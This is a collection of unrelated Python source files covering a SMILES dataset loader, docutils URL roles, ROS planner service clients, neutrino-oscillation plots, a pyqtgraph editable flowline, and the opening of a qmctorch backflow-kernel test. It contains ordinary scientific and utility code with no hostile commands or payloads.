            ex = Example.fromlist([mol, [1, 2, 3]], fields)
            smi_examples.append(ex)
        # load or build vocab
        if os.path.isfile(vocab_file):
            print('load vocab from:', vocab_file)
            # BUG FIX: close the vocab file instead of leaking the handle.
            with open(vocab_file, 'rb') as vocab_fh:
                smi_field.vocab = pickle.load(vocab_fh)
        else:
            print('build and save vocab file:', vocab_file)
            smi_field.build_vocab(mol_strs)
            # BUG FIX: close the vocab file instead of leaking the handle.
            with open(vocab_file, 'wb') as vocab_fh:
                pickle.dump(smi_field.vocab, vocab_fh, protocol=2)
        self.vocab = smi_field.vocab
        self.vocab_size = len(smi_field.vocab.itos)
        self.padding_idx = smi_field.vocab.stoi[smi_field.pad_token]
        self.sos_idx = smi_field.vocab.stoi[smi_field.init_token]
        self.eos_idx = smi_field.vocab.stoi[smi_field.eos_token]
        self.unk_idx = smi_field.vocab.stoi[smi_field.unk_token]
        self.dataset_smi = Dataset(smi_examples, fields=fields)
        self.train_smi = Dataset(smi_examples[:-5000], fields=fields)
        self.test_smi = Dataset(smi_examples[-5000:], fields=fields)

    def dataset_bucket_iter(self, batch_size=None):
        """Iterator over the full dataset, in file order (no shuffling)."""
        bsize = self.batch_size if batch_size is None else batch_size
        return BucketIterator(self.dataset_smi, batch_size=bsize, train=False, shuffle=False,
                              sort=False, sort_within_batch=False, repeat=False)

    def train_bucket_iter(self, batch_size=None):
        """Shuffled, length-bucketed iterator over the training split."""
        bsize = self.batch_size if batch_size is None else batch_size
        return BucketIterator(self.train_smi, batch_size=bsize, train=True,
                              sort_within_batch=True, repeat=False, sort_key=lambda x: len(x.smile))

    def test_bucket_iter(self, batch_size=None):
        """Length-bucketed iterator over the held-out test split."""
        bsize = self.batch_size if batch_size is None else batch_size
        return BucketIterator(self.test_smi, batch_size=bsize, train=False,
                              sort_within_batch=True, repeat=False, sort_key=lambda x: len(x.smile))

    def get_vocab(self):
        """Return the torchtext vocab built/loaded in ``__init__``."""
        return self.vocab
<reponame>tony/django-docutils
from docutils import nodes, utils
from ..utils import split_explicit_title
def generic_url_role(name, text, url_handler_fn, innernodeclass=nodes.Text):
    """Create a reference node for a URL role, handling explicit titles.

    Handles both ``:role:`target``` and ``:role:`title <target>``` forms.
    The only role-specific magic is mapping the target to a URL, which is
    delegated to the ``url_handler_fn`` callback.

    :param name: name of the role, e.g. 'github'
    :type name: string
    :param text: text inside of the role, e.g:

        - 'airline-mode/airline-mode'
        - 'this repo <airline-mode/airline-mode>'
    :type text: string
    :param url_handler_fn: a function that accepts the target and returns a URL
    :returntype url_handler_fn: string
    :returns: tuple ([node], [])
    :returntype: tuple

    Simple example, let's create a role::

        .. code-block:: python

            def github_role(
                name, rawtext, text, lineno, inliner, options={}, content=[]
            ):
                def url_handler(target):
                    return 'https://github.com/{}'.format(target)

                return generic_url_role(name, text, url_handler)

            roles.register_local_role('gh', github_role)
    """
    name = name.lower()
    has_explicit_title, title, target = split_explicit_title(text)
    title = utils.unescape(title)
    target = utils.unescape(target)

    if has_explicit_title:
        # Support lightweight markup inside explicit titles (**bold**, *em*).
        # Fix: slice off exactly the marker characters -- str.strip('**')
        # would also eat asterisks belonging to the title itself.  Length
        # guards avoid IndexError/empty results on degenerate titles.
        if len(title) >= 4 and title[:2] == '**' and title[-2:] == '**':
            innernodeclass = nodes.strong
            title = title[2:-2]
        elif len(title) >= 2 and title[:1] == '*' and title[-1:] == '*':
            innernodeclass = nodes.emphasis
            title = title[1:-1]
    # Fix: the title was previously unescaped a *second* time when no
    # explicit title was given, which mangled escaped characters.

    url = url_handler_fn(target)
    sn = innernodeclass(title, title)
    rn = nodes.reference('', '', internal=True, refuri=url, classes=[name])
    rn += sn
    return [rn], []
def generic_remote_url_role(name, text, url_handler_fn, innernodeclass=nodes.Text):
    """A generic_url_role whose handler returns both a title and a URL.

    Useful when the information lives behind a lookup (Amazon API, database
    queries, ...): the handler resolves the target to a fresh title and URL,
    and the remote title is used whenever the role has no explicit one.

    :param name: name of the role, e.g. 'github'
    :type name: string
    :param text: text inside of the role, e.g:

        - 'airline-mode/airline-mode'
        - 'this repo <airline-mode/airline-mode>'
    :type text: string
    :param url_handler_fn: a function that accepts the target and returns
        a (title, url) pair
    :returntype url_handler_fn: (string, string)
    :returns: tuple ([node], [])
    :returntype: tuple

    Simple example, let's create a role::

        .. code-block:: python

            def amzn_role(
                name, rawtext, text, lineno, inliner, options={}, content=[]
            ):
                def url_handler(target):
                    query = amzn.lookup(ItemId=target)
                    return query.title, query.offer_url

                return generic_remote_url_role(name, text, url_handler)

            roles.register_local_role('amzn', amzn_role)
    """
    name = name.lower()
    has_explicit_title, title, target = split_explicit_title(text)
    target = utils.unescape(target)

    # Resolve target remotely; prefer an explicit title when one was given.
    remote_title, url = url_handler_fn(target)
    title = utils.unescape(title if has_explicit_title else remote_title)

    node = innernodeclass(title, title)
    ref = nodes.reference('', '', internal=True, refuri=url, classes=[name])
    ref += node
    return [ref], []
|
<reponame>JKBehrens/STAAMS-Solver
#!/usr/bin/env python
"""
Copyright (c) 2018 Robert Bosch GmbH
All rights reserved.
This source code is licensed under the BSD-3-Clause license found in the
LICENSE file in the root directory of this source tree.
@author: <NAME>
"""
import rospy
from roadmap_planning_common_msgs.srv import AddOVC, AddOVCResponse, AddOVCRequest, AddOvcCt, AddOvcCtResponse, \
AddOvcCtRequest, SetState, SetStateResponse, SetStateRequest, GetIntListForStringList, \
GetIntListForStringListResponse, GetIntListForStringListRequest, AddObject, AddObjectResponse, AddObjectRequest, \
StringQueryRequest, StringQuery
from std_srvs.srv import Empty, EmptyResponse, EmptyRequest
from roadmap_planning_common_msgs.msg import ovc, Range, Domain, OrderedVisitingConstraint, ConstraintType
class PlannerServiceProxies:
    """Stateless service-proxy helpers for the prm_planner_wrapper ROS node.

    Every method builds a request, calls the matching service and returns the
    unwrapped response payload.  All former mutable default arguments are now
    resolved inside the methods so calls cannot share (and mutate) the same
    list objects.
    """

    @staticmethod
    def add_ovc(groups=None, domains=None, location_names=None, ranges=None):
        '''
        Function that creates an AddOVCRequest and sends it to the prm_planner_wrapper

        :param groups: list of groups, that should be considered for executing
            the OVC (default: ["r1_arm", "r2_arm"])
        :param domains: list of int-lists with location indexes (you can use the
            SceneObjectSearchMapping to retrieve them); default: [[1], [5]]
        :param location_names: optional list of location names (not implemented yet)
        :param ranges: list (len == len(domains)) of Range msgs or int-lists
            (len == 2); default: [[30, 500], [30, 500]]
        :return: the name of the created OVC (in a list)
        '''
        # Fix: mutable defaults moved out of the signature.
        if groups is None:
            groups = ["r1_arm", "r2_arm"]
        if domains is None:
            domains = [[1], [5]]
        if ranges is None:
            ranges = [[30, 500], [30, 500]]

        rospy.wait_for_service("/prm_planner_wrapper/add_ovc")
        srv_add_ovc = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc", AddOVC)

        ovc_req = AddOVCRequest()
        o = OrderedVisitingConstraint()
        o.groups = groups
        if location_names is not None:
            pass
            # TODO: implement!!!
        assert len(domains) == len(ranges)
        for d in domains:
            dom = Domain()
            dom.values = d
            o.location_domains.append(dom)
        for ra in ranges:
            if isinstance(ra, Range):
                o.duration_ranges.append(ra)
            elif isinstance(ra, list):
                assert len(ra) == 2
                ran = Range()  # type: Range
                ran.min = ra[0]
                ran.max = ra[1]
                o.duration_ranges.append(ran)
        ovc_req.ovcs.append(o)

        res = srv_add_ovc.call(ovc_req)  # type: AddOVCResponse
        print(res.names)
        return res.names

    @staticmethod
    def get_locs_for_names(names=None):
        '''
        This function queries the location aliases for a list of names in the roadmap

        :param names: list of object name strings
        :return: list of ints - the location aliases
        '''
        if names is None:  # fix: avoid a shared mutable default argument
            names = []
        service_name = "/prm_planner_wrapper/get_locs_for_names"
        srv_get_locs_for_names = rospy.ServiceProxy(service_name, GetIntListForStringList)
        req = GetIntListForStringListRequest()
        req.str_in = names
        res = srv_get_locs_for_names.call(req)  # type: GetIntListForStringListResponse
        return [loc for loc in res.int_out]

    @staticmethod
    def add_object_online_client(pose, name, obj_type):
        """Register an object with the running planner; returns the success flag."""
        service_name = "/prm_planner_wrapper/add_object_online"
        srv_add_obj_online = rospy.ServiceProxy(service_name, AddObject)
        req = AddObjectRequest()
        req.pose = pose
        req.object_name = name
        req.object_type = obj_type
        res = srv_add_obj_online.call(req)  # type: AddObjectResponse
        return res.success

    @staticmethod
    def solve_client():
        """Trigger a solve run on the planner (blocks until the service exists)."""
        service_name = "/prm_planner_wrapper/solve"
        rospy.wait_for_service(service_name)
        srv_client = rospy.ServiceProxy(service_name, Empty)
        req = EmptyRequest()
        res = srv_client.call(req)  # type: EmptyResponse
        return

    @staticmethod
    def reset_planner_client():
        """Reset the planner's internal state."""
        service_name = "/prm_planner_wrapper/reset_planner"
        rospy.wait_for_service(service_name)
        srv_client = rospy.ServiceProxy(service_name, Empty)
        req = EmptyRequest()
        res = srv_client.call(req)  # type: EmptyResponse
        return

    @staticmethod
    def add_ovc_ct(ovc=None, interval=None, params=None, ct_type=ConstraintType.StartsAfterEnd):
        """Add an inter-OVC constraint (e.g. ordering) between the given OVCs.

        :param ovc: list of OVC messages whose ``name`` fields identify the
            constrained OVCs
        :param interval: list of interval indexes forwarded to the service
        :param params: optional list of constraint parameters
        :param ct_type: one of the ConstraintType constants
        :return: the AddOvcCtResponse
        """
        if ovc is None:  # fix: avoid shared mutable defaults
            ovc = []
        if interval is None:
            interval = []
        add_ovc_ct_client = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc_ct", AddOvcCt)
        req = AddOvcCtRequest()
        req.ct.ovc_name = [o.name for o in ovc]
        req.ct.ct_type.val = ct_type
        req.ct.ovc_interval = interval
        req.ct.params = [] if params is None else params
        res = add_ovc_ct_client.call(req)  # type: AddOvcCtResponse
        return res

    @staticmethod
    def add_state_ct(group_name, state_index, values, use_location=True):
        # type: (str, int, list, bool) -> bool
        '''
        Restrict the value of a configuration variable identified by the group_name
        and the state_index to be in values. If use_location is True, the
        configuration must be one of the configurations reaching any of the
        locations in values.

        :param group_name: name of the active component
        :param state_index: index to select the configuration variables. Negative
            values are possible (e.g. -1 denotes the last configuration)
        :param values: list of integers.
        :param use_location: determines if values are interpreted as locations
            or configurations
        :return: returns False, if the problem gets infeasible
        '''
        srv_set_state = rospy.ServiceProxy("/prm_planner_wrapper/set_state", SetState)
        set_state_req = SetStateRequest()
        set_state_req.group = group_name
        set_state_req.state_index = state_index
        set_state_req.values.values = values
        set_state_req.use_location = use_location
        res = srv_set_state.call(set_state_req)
        return res.success

    # TODO: factor out to motion dispatcher service clients
    @staticmethod
    def move_arm_to_node_client(input=None):
        """Ask the motion dispatcher to move to the named roadmap node(s).

        :param input: list of node name strings
        :return: (output, success) from the StringQuery response, or None if
            the service call raised
        """
        if input is None:  # fix: avoid a shared mutable default argument
            input = []
        service_name = 'MOTION_DISPATCHER/MOVE_TO_NODE'
        rospy.wait_for_service(service_name)
        try:
            get_obj_srv = rospy.ServiceProxy(service_name, StringQuery)
            req = StringQueryRequest()  # type: StringQueryRequest
            req.input = input
            resp1 = get_obj_srv(req)  # type: StringQueryResponse
            return resp1.output, resp1.success
        except rospy.ServiceException as e:  # fix: Py2-only "except X, e" syntax
            print("Service call failed: %s" % e)
# srv_add_ovc_ct = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc_ct", AddOvcCt)
# srv_set_state = rospy.ServiceProxy("/prm_planner_wrapper/set_state", SetState)
# srv_add_obj_online = rospy.ServiceProxy("/prm_planner_wrapper/add_object_online", AddObject)
|
import numpy as np # type: ignore
import nptyping as npt # type: ignore
from typing import Any, Optional, Tuple
import matplotlib.pyplot as plt # type: ignore
from astropy.constants import codata2018 as ac # type: ignore
import astropy.units as u # type: ignore
from astropy.visualization import quantity_support # type: ignore
# Flavour labels indexed 0=e, 1=mu, 2=tau (used for plot legends below).
neutrino_names = ['e', 'mu', 'tau']
# Mass of the lightest neutrino eigenstate (minimal-mass scenario).
m_min = 0 * u.eV
def osc_probability(
    E_over_L: npt.NDArray[float],
    initial_flavour: int = 0,
    final_flavour: int = 1,
    ordering: str = 'normal',
):
    """
    Probability of oscillation from ``initial_flavour`` to ``final_flavour``.

    Args:
        E_over_L (float): in eV**2
        initial_flavour (int): number between 0=e, 1=mu, 2=tau
        final_flavour (int): number between 0=e, 1=mu, 2=tau
        ordering (str): either normal or inverted
    """
    masses, mixing_matrix = prepare_oscillation_parameters(ordering)
    # Amplitude A = sum_i U*_{a i} U_{b i} exp(-i m_i^2 / (2 E/L));
    # probability is |A|^2.  Broadcast mass eigenstates against E/L values.
    phases = np.exp(- 1j * masses[:, np.newaxis]**2
                    / E_over_L[np.newaxis, :]
                    / 2)
    amplitude = np.sum(
        np.conj(mixing_matrix[initial_flavour, :, np.newaxis])
        * mixing_matrix[final_flavour, :, np.newaxis]
        * phases,
        axis=0)
    return abs(amplitude)**2
def matrix(theta_12: float, theta_13: float, theta_23: float, delta_CP: float):
    """Return the 3x3 complex PMNS mixing matrix.

    Standard parametrization from the three mixing angles (radians) and the
    CP-violating phase ``delta_CP``.
    """
    c12, s12 = np.cos(theta_12), np.sin(theta_12)
    c13, s13 = np.cos(theta_13), np.sin(theta_13)
    c23, s23 = np.cos(theta_23), np.sin(theta_23)
    phase = np.exp(1j * delta_CP)
    phase_conj = np.exp(-1j * delta_CP)

    row_e = [c12 * c13,
             s12 * c13,
             s13 * phase_conj]
    row_mu = [-s12 * c23 - c12 * s23 * s13 * phase,
              c12 * c23 - s12 * s13 * s23 * phase,
              s23 * c13]
    row_tau = [s12 * s23 - c12 * c23 * s13 * phase,
               -c12 * s23 - s12 * c23 * s13 * phase,
               c23 * c13]
    return np.array([row_e, row_mu, row_tau])
@u.quantity_input
def osc_plot(
    E_over_L,
    # E_over_L: u.Quantity[u.MeV / u.km],
    op: np.ndarray,
    initial: int,
    final: int
):
    """Draw one oscillation-probability curve on a log-x axis."""
    label = (f'Transition from {neutrino_names[initial]} '
             f'to {neutrino_names[final]}')
    with quantity_support():
        plt.semilogx(E_over_L, op, label=label)
@u.quantity_input
def flux_plot(
    L_over_E,
    # L_over_E: u.Quantity[u.km / u.MeV],
    op: np.ndarray,
    flux: np.ndarray,
    **kwargs):
    """Plot the oscillated flux (solid) next to the unoscillated flux (dotted)."""
    with quantity_support():
        oscillated = op * flux
        plt.plot(L_over_E, oscillated, **kwargs)
        plt.plot(L_over_E, flux, ls=':')
def flux(E: np.ndarray):
    """Reactor antineutrino flux parametrization.

    Parametrization from https://arxiv.org/abs/0807.3203,
    where the energy is in MeV (?).  The four exponentials are isotope
    contributions; the prefactor is the inverse-beta-decay kinematic factor
    built from the emitted positron's energy and momentum.
    """
    # E /= 1.2
    # energy and momentum of the emitted positron
    Ep = E - 1.29333236  # energy minus the neutron-proton mass difference
    pp = np.sqrt(Ep**2 - 0.51099895**2)  # subtract the positron rest mass
    # (amplitude, and the three polynomial coefficients of each exponent)
    isotope_terms = (
        (.58, .87, .16, .091),
        (.30, .896, .239, .0981),
        (.07, .976, .162, .079),
        (.05, .793, .08, .1085),
    )
    spectrum = sum(a * np.exp(b - c * E - d * E**2)
                   for a, b, c, d in isotope_terms)
    return spectrum * Ep * pp * E**2
def prepare_oscillation_parameters(ordering: str = 'normal') -> Tuple[npt.NDArray[(3, ), float], npt.NDArray[(3, 3), np.complex128]]:
    """Return the three neutrino masses (as floats, in eV) and the PMNS matrix
    for the requested mass ordering ('normal' or 'inverted')."""
    # based on the values given in http://arxiv.org/abs/1507.05613
    if ordering == 'normal':
        # mixing angles from sin^2 best-fit values
        theta_12 = np.arcsin(np.sqrt(.308))
        # NOTE(review): theta_13 deviates from the commented best-fit value
        # below -- presumably an intentional tweak; confirm before reuse.
        theta_13 = np.arcsin(np.sqrt(.1)) / 2
        # theta_13 = np.arcsin(np.sqrt(.0234))
        theta_23 = np.arcsin(np.sqrt(.437))
        delta_m21_square = 7.54e-5 * u.eV**2
        delta_m31_square = 2.47e-3 * u.eV**2
        delta_CP = 1.39 * np.pi
        # normal ordering: m1 is the lightest state
        m1 = m_min
        m2 = np.sqrt(delta_m21_square + m1**2)
        m3 = np.sqrt(delta_m31_square + m1**2)
    elif ordering == 'inverted':
        theta_12 = np.arcsin(np.sqrt(.308))
        theta_13 = np.arcsin(np.sqrt(.0240))
        theta_23 = np.arcsin(np.sqrt(.455))
        delta_m21_square = 7.54e-5 * u.eV**2
        # negative: m3 below the m1/m2 pair
        delta_m31_square = -2.42e-3 * u.eV**2
        delta_CP = 1.31 * np.pi
        # inverted ordering: m3 is the lightest state
        m3 = m_min
        m1 = np.sqrt(m3**2 - delta_m31_square)
        m2 = np.sqrt(delta_m21_square + m1**2)
    else:
        raise NotImplementedError(f'Ordering {ordering} not found')
    U = matrix(theta_12, theta_13, theta_23, delta_CP)
    # strip astropy units; masses are returned as plain floats in eV
    masses = np.array([m1.value, m2.value, m3.value])
    return masses, U
def oscillations():
    """Plot the e -> {e, mu, tau} oscillation probabilities for JUNO-like
    parameters (60 km baseline, 1 MeV - 10 GeV)."""
    # parameters for Juno
    energies = np.logspace(0, 4, num=2000) * u.MeV
    baseline = 60 * u.km
    # convert E/L to eV^2 (natural units) for osc_probability ...
    E_over_L = (energies / baseline * ac.c * ac.hbar).to(u.eV**2).value
    # ... and back to MeV/km for the plot axis
    rescaled = (E_over_L * u.eV**2 / ac.hbar / ac.c).to(u.MeV / u.km)

    initial = 0
    for final in range(3):
        probability = osc_probability(E_over_L, initial, final)
        osc_plot(rescaled, probability, initial, final)
    plt.legend()
def juno_flux():
    """Compare the oscillated reactor flux for normal vs inverted ordering
    over a 5-32 km baseline scan at E = 1 MeV."""
    E = 1 * u.MeV
    baselines = np.linspace(5, 32, num=1000) * u.km
    E_over_L = (E / baselines * ac.c * ac.hbar).to(u.eV**2).value

    # electron-antineutrino survival probability for both orderings
    op_normal = osc_probability(E_over_L, 0, 0, ordering='normal')
    op_inverted = osc_probability(E_over_L, 0, 0, ordering='inverted')

    rescaled = (E_over_L * u.eV**2 / ac.hbar / ac.c).to(u.MeV / u.km)
    f = flux((rescaled * 60 * u.km).to(u.MeV).value)
    # op = np.convolve(op, np.ones(25)/25, mode='same')
    flux_plot(1/rescaled, op_normal, f, label='normal')
    flux_plot(1/rescaled, op_inverted, f, label='inverted')
    plt.ylabel('Flux [arbitrary units]')
    plt.legend()
if __name__ == "__main__":
    # Render and save both figures through the shared plotting harness.
    from make_all_figures import plot_and_save
    plot_and_save(oscillations)
    plot_and_save(juno_flux)
|
<gh_stars>0
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
class FlowlinePath(pg.PlotDataItem):
    """An interactively editable polyline ("flowline") plot item.

    Supports dragging points, (multi-)selection, deleting selected points,
    subdividing a segment, and extending the path from either end
    ("extend mode").

    NOTE(review): Python 2 code (``print`` statement in setExtendMode).
    NOTE(review): ``self.selectFlowline`` is never defined in this class --
    presumably attached by the owning widget; confirm before reuse.
    """

    def __init__(self):
        # Index of point being dragged
        self.drag_index = None
        # How far to translate dragged point from original position
        self.drag_offset = None
        # Brush for highlighted point
        self.selected_brush = pg.mkBrush('r')
        # Brush for default points
        self.default_brush = pg.mkBrush('k')
        # Number of points
        self.num_points = 0
        # Indexes of the currently selected points
        self.selected_indexes = set([])
        # Extend mode?
        self.extend_mode = False
        # Index of the endpoint that tracks the mouse while extending
        self.moving_point_index = None
        # Control button pressed
        self.ctrl_pressed = False
        pg.PlotDataItem.__init__(self)
        ### Event handling
        # Triggered when a point is clicked
        self.scatter.sigClicked.connect(self.pointClicked)

    ### Sets the initial data
    def setData(self, **kwds):
        self.data = kwds
        # Check to make sure we have all required fields
        if 'x' in kwds and 'y' in kwds:
            # Set positions
            self.setPositionData(self.data.pop('x'), self.data.pop('y'))
            # Set data for each point
            self.setPointData()
            # Refresh list of symbol brushes
            self.setSymbolBrushes()
            # Update graph
            self.updateGraph()

    ### Set position data
    def setPositionData(self, xs, ys):
        self.num_points = len(xs)
        self.data['x'] = xs
        self.data['y'] = ys

    ### Gets the position of a point with the given index
    def getPosition(self, index):
        return np.array([self.data['x'][index], self.data['y'][index]])

    ### Sets coordinates of point with given index
    def setPointCoords(self, index, coords):
        self.data['x'][index] = coords[0]
        self.data['y'][index] = coords[1]

    ### Get coordinates of point with given index
    # NOTE(review): duplicate of getPosition above.
    def getPointCoords(self, index):
        return np.array([self.data['x'][index], self.data['y'][index]])

    ### Set additional data associated with each point
    def setPointData(self):
        # Each scatter point carries its own index so click/drag handlers can
        # recover which point was hit (see pts[0].data()[0] below).
        self.data['data'] = np.empty(self.num_points, dtype=[('index', int)])
        self.data['data']['index'] = np.arange(self.num_points)

    ### Sets symbol brushes after points have been inserted or removed
    def setSymbolBrushes(self):
        brushes = np.empty(self.num_points, dtype=object)
        brushes[:] = self.default_brush
        self.data['symbolBrush'] = brushes

    ### Insert a point at given index
    def insertPoint(self, index, coords):
        self.num_points += 1
        # Insert position data
        self.data['x'] = np.insert(self.data['x'], index, coords[0])
        self.data['y'] = np.insert(self.data['y'], index, coords[1])
        # Update point data
        # NOTE(review): the per-point index record is *appended* rather than
        # inserted at `index`, so indexes look stale after a mid-path insert
        # until setPointData() rebuilds them (e.g. via removePoints) -- verify.
        self.data['data'] = np.append(self.data['data'], np.array((self.num_points - 1,), self.data['data'].dtype))
        # Update symbol brushes
        self.data['symbolBrush'] = np.append(self.data['symbolBrush'], self.default_brush)

    ### Adds a point at beginning of path
    def addPointStart(self, coords):
        self.insertPoint(0, coords)

    ### Adds a point at end of path
    def addPointEnd(self, coords):
        self.insertPoint(self.num_points, coords)

    ### Remove points with given indexes
    def removePoints(self, indexes):
        self.num_points -= len(indexes)
        # Update point data
        self.data['x'] = np.delete(self.data['x'], indexes)
        self.data['y'] = np.delete(self.data['y'], indexes)
        # Reset point data, brushes, selected indexes
        self.setPointData()
        self.setSymbolBrushes()
        self.selected_indexes.clear()

    ### Indicates a point is selected by using a different brush
    def addSelectedPoint(self, index):
        self.selected_indexes.add(index)
        self.data['symbolBrush'][index] = self.selected_brush

    ### Deselect all currently selected points
    def deselectAll(self):
        for index in self.selected_indexes:
            self.data['symbolBrush'][index] = self.default_brush
        self.selected_indexes.clear()

    ### Respond to a mouse drag
    def mouseDragEvent(self, ev):
        # Tell the owner this flowline is the active one (externally attached).
        self.selectFlowline(self)
        if ev.button() != QtCore.Qt.LeftButton:
            ev.ignore()
            return
        if ev.isStart():
            # We are already one step into the drag. Find the point(s) at the mouse
            # cursor when the button was first pressed:
            pos = ev.buttonDownPos()
            pts = self.scatter.pointsAt(pos)
            if len(pts) == 0:
                ev.ignore()
                return
            # Get the index of the dragged point
            self.drag_index = pts[0].data()[0]
            # Offset from the original position
            self.drag_offset = self.getPointCoords(self.drag_index) - pos
            # Select only this point
            self.deselectAll()
            self.addSelectedPoint(self.drag_index)
        elif ev.isFinish():
            self.drag_index = None
            return
        else:
            if self.drag_index is None:
                ev.ignore()
                return
        # In the midst of a drag: move the point under the cursor (keeping
        # the original grab offset) and redraw.
        self.setPointCoords(self.drag_index, ev.pos() + self.drag_offset)
        self.updateGraph()
        ev.accept()

    ### Dumb setter function for extend mode so I can keep track of when
    ### extend mode is toggled
    def setExtendMode(self, mode):
        print "extend mode", mode
        self.extend_mode = mode

    ### Respond to a click that's not on a point
    def offPointClick(self):
        if self.extend_mode:
            # Clicking empty canvas in extend mode drops another point.
            self.extend()
        else :
            self.deselectAll()
        self.updateGraph()

    ### Respond to mouse movement
    def mouseMove(self, pos):
        # Get mouse coordinates
        coords = np.array([pos.x(), pos.y()])
        # Check if we're in extend mode
        if self.extend_mode:
            # Move the first or last point + associated boundary points to mouse coordinates
            self.setPointCoords(self.moving_point_index, coords)
            self.updateGraph()

    ### Extend the current path
    def extend(self):
        # Freeze the tracking endpoint in place and spawn a fresh one that
        # continues to follow the mouse.
        self.deselectAll()
        pos = self.getPointCoords(self.moving_point_index)
        if self.moving_point_index == 0:
            # Extending from the start: the new point takes index 0.
            self.addPointStart(pos)
        else :
            # Extending from the end: the tracked index shifts up by one.
            self.addPointEnd(pos)
            self.moving_point_index += 1

    ### Event called when a point is clicked
    def pointClicked(self, p, pts):
        self.selectFlowline(self)
        if self.extend_mode:
            # If we're in extend mode, keep extending the path
            self.extend()
        else :
            # Otherwise select a point (ctrl adds to the selection)
            if not self.ctrl_pressed:
                self.deselectAll()
            self.addSelectedPoint(pts[0].data()[0])
        self.updateGraph()

    ### Respond to delete key press
    def deleteKeyPressed(self):
        # If there is a selected point, and we're not in extend mode, delete it
        if (not self.extend_mode) and (not len(self.selected_indexes) == 0):
            self.removePoints(np.array(list(self.selected_indexes)))
            self.updateGraph()

    ### Triggers when e key is pressed for extend mode
    def extendKeyPressed(self):
        # Check if there's one selected point and it's either the first or last
        # One point is selected
        one_selected = len(self.selected_indexes) == 1
        # First center point is selected
        first_selected = 0 in self.selected_indexes
        # Last center point is selected
        last_selected = self.num_points - 1 in self.selected_indexes
        # Combined conditional
        cond = one_selected and (last_selected or first_selected)
        if (not self.extend_mode) and cond:
            # Enable extend mode
            self.setExtendMode(True)
            self.deselectAll()
            # If selected point is at beginning of path, add points starting from
            # there. If selected point is at end, add points from there.
            if first_selected:
                pos = self.getPointCoords(0)
                # Add a point + children
                self.addPointStart(pos)
                # Set moving index to the index of the newly added center point
                self.moving_point_index = 0
            else :
                pos = self.getPointCoords(self.num_points - 1)
                self.addPointEnd(pos)
                self.moving_point_index = self.num_points - 1
        else :
            # Disable extend mode
            self.setExtendMode(False)
            self.deselectAll()
        self.updateGraph()

    ### Triggered when the subdivide key is pressed
    def subdivideKeyPressed(self):
        # If we're not in extend mode, check if there are two points selected
        if not self.extend_mode and len(self.selected_indexes) == 2:
            indexes = list(self.selected_indexes)
            # Check if two adjacent points are selected
            if abs(indexes[0] - indexes[1]) == 1:
                # Insert a new center point between the two selected center points
                pos1 = self.getPointCoords(indexes[0])
                pos2 = self.getPointCoords(indexes[1])
                new_pos = (pos1 + pos2) / 2.
                self.deselectAll()
                self.insertPoint(min(indexes) + 1, new_pos)
                self.updateGraph()

    ### Update the graph data so the graph is redrawn
    def updateGraph(self):
        pg.PlotDataItem.setData(self, **self.data)

    ### Several necessary inherited functions
    def shape(self):
        # Inherit shape from the curve item
        return self.scatter.shape()

    def boundingRect(self):
        # All graphics items require this method (unless they have no contents)
        return self.shape().boundingRect()

    def paint(self, p, *args):
        # All graphics items require this method (unless they have no contents)
        return
|
<gh_stars>10-100
import unittest
import torch
from pyscf import gto
from torch import nn
from torch.autograd import Variable, grad
import numpy as np
from qmctorch.scf import Molecule
from qmctorch.wavefunction.orbitals.backflow.kernels import BackFlowKernelBase
from qmctorch.wavefunction.jastrows.distance.electron_electron_distance import ElectronElectronDistance
# Use double precision everywhere and pin the RNG seeds so the autograd
# comparisons in the tests below are deterministic.
torch.set_default_tensor_type(torch.DoubleTensor)
torch.manual_seed(101)
np.random.seed(101)
def hess(out, pos):
    """Diagonal of the Hessian of ``out`` with respect to ``pos``.

    Args:
        out: (nbatch,) tensor computed from ``pos`` via autograd ops.
        pos: (nbatch, ndim) tensor with requires_grad enabled.

    Returns:
        (nbatch, ndim) tensor holding d^2 out / d pos_i^2 per dimension.
    """
    # First derivative (jacobian) of out w.r.t. pos.
    ones_out = Variable(torch.ones(out.shape))
    jacobian = grad(out, pos,
                    grad_outputs=ones_out,
                    only_inputs=True,
                    create_graph=True)[0]

    # Differentiate each jacobian column again, keeping only the matching
    # (diagonal) component of the second derivative.
    ones_batch = Variable(torch.ones(jacobian.shape[0]))
    diagonal = torch.zeros(jacobian.shape)
    for dim in range(jacobian.shape[1]):
        second = grad(jacobian[:, dim], pos,
                      grad_outputs=ones_batch,
                      only_inputs=True,
                      create_graph=True)[0]
        diagonal[:, dim] = second[:, dim]
    return diagonal
def hess_single_element(out, inp):
    """Element-wise second derivative of ``out`` with respect to ``inp``.

    Computes d^2 out_k / d inp_k^2 and returns it reshaped to ``out``'s
    original shape.
    """
    shape = out.shape
    flat = out.reshape(-1, 1)

    # First derivative (jacobian) of the flattened output.
    ones_flat = Variable(torch.ones(flat.shape))
    jacobian = grad(flat, inp,
                    grad_outputs=ones_flat,
                    only_inputs=True,
                    create_graph=True)[0]

    # Second derivative: differentiate the jacobian once more.
    ones_jac = Variable(torch.ones(jacobian.shape))
    second = grad(jacobian, inp,
                  grad_outputs=ones_jac,
                  only_inputs=True,
                  create_graph=True)[0]
    return second.reshape(*shape)
class GenericBackFlowKernel(BackFlowKernelBase):
    """Generic quadratic backflow kernel used to exercise the autodiff tests."""

    def __init__(self, mol, cuda=False):
        """Define a generic kernel to test the auto diff features."""
        super().__init__(mol, cuda)
        eps = 1E-4
        # Fix: create the tensor on the target device *before* wrapping it in
        # nn.Parameter.  `nn.Parameter(...).to(device)` returns a plain
        # non-leaf tensor when a transfer happens, so the weight would not be
        # registered as a module parameter.
        self.weight = nn.Parameter(
            eps * torch.rand(self.nelec, self.nelec, device=self.device))

    def _backflow_kernel(self, ree):
        """Computes the backflow kernel:

        .. math:
            \\eta(r_{ij}) = w_{ij} r_{ij}^2

        Args:
            ree (torch.tensor): e-e distance Nbatch x Nelec x Nelec

        Returns:
            torch.tensor : f(r) Nbatch x Nelec x Nelec
        """
        return self.weight * ree * ree
class TestGenericBackFlowKernel(unittest.TestCase):
    """Validate the kernel's analytic derivatives against autograd."""

    def setUp(self):
        # define the molecule (single carbon atom, pyscf SCF, dzp basis)
        at = 'C 0 0 0'
        basis = 'dzp'
        self.mol = Molecule(atom=at,
                            calculator='pyscf',
                            basis=basis,
                            unit='bohr')
        # define the kernel
        self.kernel = GenericBackFlowKernel(self.mol)
        self.edist = ElectronElectronDistance(self.mol.nelec)
        # define the grid points: npts random electron configurations,
